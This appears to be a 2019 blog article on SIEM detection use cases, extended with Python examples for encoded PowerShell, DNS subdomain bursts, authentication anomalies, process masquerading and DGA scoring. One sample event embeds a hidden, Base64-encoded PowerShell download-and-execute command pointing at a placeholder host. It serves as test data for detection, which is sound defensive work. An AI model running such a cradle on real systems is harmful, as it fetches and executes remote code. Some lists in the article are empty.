ANATOMY OF SIEM USE CASES
There are many standard SIEM use cases like:
Those standard use cases are supported by most SIEM solutions.
There are some advanced use cases (rules) like:
- Alert when a PowerShell command line contains a Base64-encoded argument longer than 100 characters
- More than three password changes for the same user within 30 days
- Notify when more than 10 DNS requests within 5 minutes share the same domain but have different subdomains, for example xxx.domain.com and yyy.domain.com
- Misuse of an account
- Lateral movement
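The first three rules above are simple enough to express as threshold logic over normalised events. The following is an added example, not code from the original article: it runs the three rules over constructed sample events (the event schema with 'ts', 'type', 'host', 'user', 'qname' fields, the helper names and the Base64 sanity check are assumptions, not any product's API).

```python
"""Three of the rule-style use cases above, run over constructed sample events.

Added example, not code from the original article. The event schema (a list of
dicts with 'ts', 'type' and a few named fields) and the helper names are
assumptions; a real SIEM would feed normalised events from its own pipeline.
"""
import base64
import binascii
import re
from collections import defaultdict
from datetime import datetime, timedelta

# A run of 100+ Base64 alphabet characters, optionally padded.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")


def looks_like_base64(token: str) -> bool:
    """Confirm the token really decodes, so a long hex string or URL does not match."""
    try:
        base64.b64decode(token + "=" * (-len(token) % 4), validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def detect_encoded_powershell(events, min_len=100):
    """Rule 1: PowerShell launched with a Base64 argument longer than min_len chars."""
    hits = []
    for e in events:
        if e["type"] != "process" or "powershell" not in e["image"].lower():
            continue
        for token in BASE64_RUN.findall(e["cmdline"]):
            if len(token) > min_len and looks_like_base64(token):
                hits.append((e["ts"], e["host"], len(token)))
                break
    return hits


def detect_password_churn(events, limit=3, window=timedelta(days=30)):
    """Rule 2: more than `limit` password changes for one user inside a sliding window."""
    per_user = defaultdict(list)
    for e in events:
        if e["type"] == "password_change":
            per_user[e["user"]].append(e["ts"])
    hits = []
    for user, times in per_user.items():
        times.sort()
        for i, t in enumerate(times):
            in_window = sum(1 for x in times[: i + 1] if x > t - window)
            if in_window > limit:
                hits.append((user, t, in_window))
                break  # one alert per user is enough
    return hits


def detect_subdomain_burst(events, limit=10, window=timedelta(minutes=5)):
    """Rule 3: more than `limit` distinct subdomains of one domain queried from one
    host inside a sliding window (the classic DNS tunnelling / exfiltration shape).
    The 'domain' is taken as the last two labels, an assumption that breaks for
    suffixes like co.uk; production code should use the public suffix list."""
    by_domain = defaultdict(list)
    for e in events:
        if e["type"] != "dns":
            continue
        labels = e["qname"].rstrip(".").lower().split(".")
        if len(labels) < 3:
            continue  # no subdomain label at all
        by_domain[(e["host"], ".".join(labels[-2:]))].append((e["ts"], ".".join(labels)))
    hits = []
    for (host, domain), queries in by_domain.items():
        queries.sort()
        for i, (t, _) in enumerate(queries):
            names = {n for ts, n in queries[: i + 1] if ts > t - window}
            if len(names) > limit:
                hits.append((host, domain, len(names)))
                break
    return hits


# --- constructed sample events (not real telemetry) ---
T0 = datetime(2020, 1, 1, 12, 0, 0)
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16-le")
).decode()

SAMPLE_EVENTS = [
    {"ts": T0, "type": "process", "host": "ws01", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -EncodedCommand {ENCODED_PAYLOAD}"},
    {"ts": T0, "type": "process", "host": "ws02", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command Get-Service"},  # benign, no Base64 blob
]
SAMPLE_EVENTS += [{"ts": datetime(2020, 1, d), "type": "password_change", "user": "alice"}
                  for d in (1, 10, 20, 28)]   # four changes in 30 days -> alert
SAMPLE_EVENTS += [{"ts": datetime(2020, 1, d), "type": "password_change", "user": "bob"}
                  for d in (1, 15, 30)]       # exactly three -> no alert
SAMPLE_EVENTS += [{"ts": T0 + timedelta(seconds=10 * i), "type": "dns", "host": "ws01",
                   "qname": f"{i:04x}.tunnel.example.net"} for i in range(12)]   # 12 distinct labels
SAMPLE_EVENTS += [{"ts": T0 + timedelta(seconds=10 * i), "type": "dns", "host": "ws02",
                   "qname": "www.example.com"} for i in range(15)]   # repeats of one name: benign


if __name__ == "__main__":
    print(detect_encoded_powershell(SAMPLE_EVENTS))
    print(detect_password_churn(SAMPLE_EVENTS))
    print(detect_subdomain_burst(SAMPLE_EVENTS))
```

Two details matter in practice: the Base64 rule validates that the blob actually decodes, otherwise long hex hashes and URLs in command lines produce noise, and the DNS rule counts distinct names rather than raw query volume, so a host hammering one hostname does not trip a rule meant for subdomain churn.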
Some SIEM solutions support some of those use cases, but not all of them.
There are use cases specific to next-gen SIEM solutions like:
- Return the days on which a user accessed more assets than the 95th percentile of their own daily count
- Look for a user whose HTTP-to-DNS protocol ratio on a given day of the week (e.g. the fourth) is 300% higher than that of 95% of other users over the preceding four weeks
- Alert when a user's ratio of failed to successful authentications reaches 10%
- Data-loss detection by monitoring all endpoints for an abnormal volume of data egress
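What separates these from the rules above is that the threshold comes from a baseline computed over the data itself rather than from a fixed number. The following is an added example, not code from the original article, showing the first and third use cases (the per-user 95th percentile and the failed-to-successful ratio) over constructed data; the event shapes, the nearest-rank percentile and the min_attempts guard are assumptions.

```python
"""Two of the baseline-driven use cases above on constructed data: days on which
a user exceeds their own 95th-percentile asset count, and a failed-to-successful
authentication ratio reaching 10%.

Added example, not code from the original article. The event shapes, the
nearest-rank percentile and the min_attempts guard are assumptions.
"""
import math
from collections import Counter, defaultdict
from datetime import date


def percentile(values, p):
    """Nearest-rank percentile: the smallest value with at least p% of samples at or below it."""
    ordered = sorted(values)
    rank = max(1, math.ceil(p / 100 * len(ordered)))
    return ordered[rank - 1]


def days_over_own_p95(access_events):
    """Return {user: [days]} where the user's distinct-asset count for the day
    exceeded the 95th percentile of that same user's daily counts."""
    assets_per_user_day = defaultdict(set)
    for e in access_events:
        assets_per_user_day[(e["user"], e["day"])].add(e["asset"])
    daily_counts = defaultdict(dict)
    for (user, day), assets in assets_per_user_day.items():
        daily_counts[user][day] = len(assets)
    flagged = {}
    for user, by_day in daily_counts.items():
        p95 = percentile(by_day.values(), 95)
        over = sorted(day for day, n in by_day.items() if n > p95)
        if over:
            flagged[user] = over
    return flagged


def failed_auth_ratio_alerts(auth_events, threshold=0.10, min_attempts=20):
    """Return {user: ratio} for users whose failed/successful ratio reaches the threshold.
    min_attempts (assumption) stops one failure against two successes from alerting;
    a user with failures and no successes gets an infinite ratio and always alerts."""
    failed, succeeded = Counter(), Counter()
    for e in auth_events:
        (succeeded if e["ok"] else failed)[e["user"]] += 1
    alerts = {}
    for user in set(failed) | set(succeeded):
        if failed[user] + succeeded[user] < min_attempts:
            continue
        ratio = failed[user] / succeeded[user] if succeeded[user] else math.inf
        if ratio >= threshold:
            alerts[user] = round(ratio, 3)
    return alerts


# --- constructed sample data (not real telemetry) ---
ACCESS_EVENTS = []
for d in range(1, 31):
    n = 40 if d == 30 else 3 + d % 3          # alice: 3-5 assets a day, 40 on day 30
    ACCESS_EVENTS += [{"user": "alice", "day": date(2020, 1, d), "asset": f"srv{i:02d}"} for i in range(n)]
    ACCESS_EVENTS += [{"user": "bob", "day": date(2020, 1, d), "asset": f"srv{i:02d}"} for i in range(2)]

AUTH_EVENTS = (
    [{"user": "alice", "ok": True}] * 100 + [{"user": "alice", "ok": False}] * 3    # 3%: quiet
    + [{"user": "carol", "ok": True}] * 50 + [{"user": "carol", "ok": False}] * 12  # 24%: alert
    + [{"user": "dave", "ok": False}] * 5                                            # too few attempts
    + [{"user": "eve", "ok": False}] * 25                                            # only failures: alert
)

if __name__ == "__main__":
    print(days_over_own_p95(ACCESS_EVENTS))
    print(failed_auth_ratio_alerts(AUTH_EVENTS))
```

Note that the percentile is computed per user, so a service account that touches 200 assets every day is never flagged for doing so, while an analyst who normally touches five and suddenly touches forty is. The ratio rule needs the minimum-attempt guard for the opposite reason: with tiny counts the ratio is dominated by noise.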
Besides those next-gen use cases, a modern SIEM should leverage machine learning to detect
A modern SIEM should also measure, in real time, the similarity between the names of running processes and well-known process names using Levenshtein distance, to detect process masquerading, where malware takes a name that differs from a legitimate one by only a character or two.
Detecting domain generation algorithm (DGA) domains by measuring the character entropy of queried names is another next-gen SIEM feature.
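Both of these are string-level checks that need no training data. The following is an added example, not code from the original article, implementing the Levenshtein masquerade check and the entropy score; the process allow-list, the distance cut-off, the entropy and length thresholds, and the sample names are all assumptions to be tuned against real telemetry.

```python
"""Levenshtein-distance process-masquerade detection and entropy-based DGA
scoring, as an added example (not code from the original article). The
process allow-list, the distance cut-off and the entropy/length thresholds
are assumptions to be tuned against your own telemetry.
"""
import math
from collections import Counter


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert/delete/substitute) with the two-row DP."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


# Names worth protecting; masquerading malware picks near-misses of these.
KNOWN_SYSTEM_PROCESSES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe",
                          "services.exe", "winlogon.exe"}


def masquerade_candidates(process_name, known=KNOWN_SYSTEM_PROCESSES, max_distance=2):
    """Return [(distance, known_name)] for a running process whose name is close to,
    but not identical with, a well-known name. An exact match is not a masquerade
    (whether it runs from the right path is a separate rule)."""
    name = process_name.lower()
    if name in known:
        return []
    out = []
    for k in known:
        d = levenshtein(name, k)
        if d <= max_distance:
            out.append((d, k))
    return sorted(out)


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def dga_score(fqdn, min_entropy=3.5, min_len=10):
    """Score the registrable label of a queried name. Returns (entropy, suspicious).
    The label is taken as the second-to-last one (assumption; use the public
    suffix list for co.uk-style domains). The length guard cuts false positives
    from short high-entropy brands; CDN and cloud hostnames still need an allow-list."""
    labels = fqdn.rstrip(".").lower().split(".")
    label = labels[-2] if len(labels) >= 2 else labels[0]
    h = shannon_entropy(label)
    return round(h, 3), h >= min_entropy and len(label) >= min_len


if __name__ == "__main__":
    for p in ("svch0st.exe", "scvhost.exe", "chrome.exe", "svchost.exe"):
        print(p, masquerade_candidates(p))
    for q in ("www.microsoft.com", "qwr8zkt3vbn2pl.com"):   # constructed names
        print(q, dga_score(q))
```

The distance cut-off of 2 catches a swapped digit (svch0st) and a transposition (scvhost) while leaving unrelated names alone, but it will also flag legitimately similar binaries, so the allow-list should be short and the hit should be enriched with the image path before it becomes an alert. For the entropy check, a real word like "microsoft" scores under 3 bits per character and a random 14-character label scores about 3.8; the threshold sits between them, and the length guard is what keeps short brand names out.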
Real-time detection is critical for a SIEM. Use cases such as unauthorized configuration changes or deletion of audit trails are especially important: they should be escalated immediately to stop the damage and limit further risk. All next-gen SIEMs have real-time detection capability.
Originally published at https://www.peerlyst.com on December 23, 2019.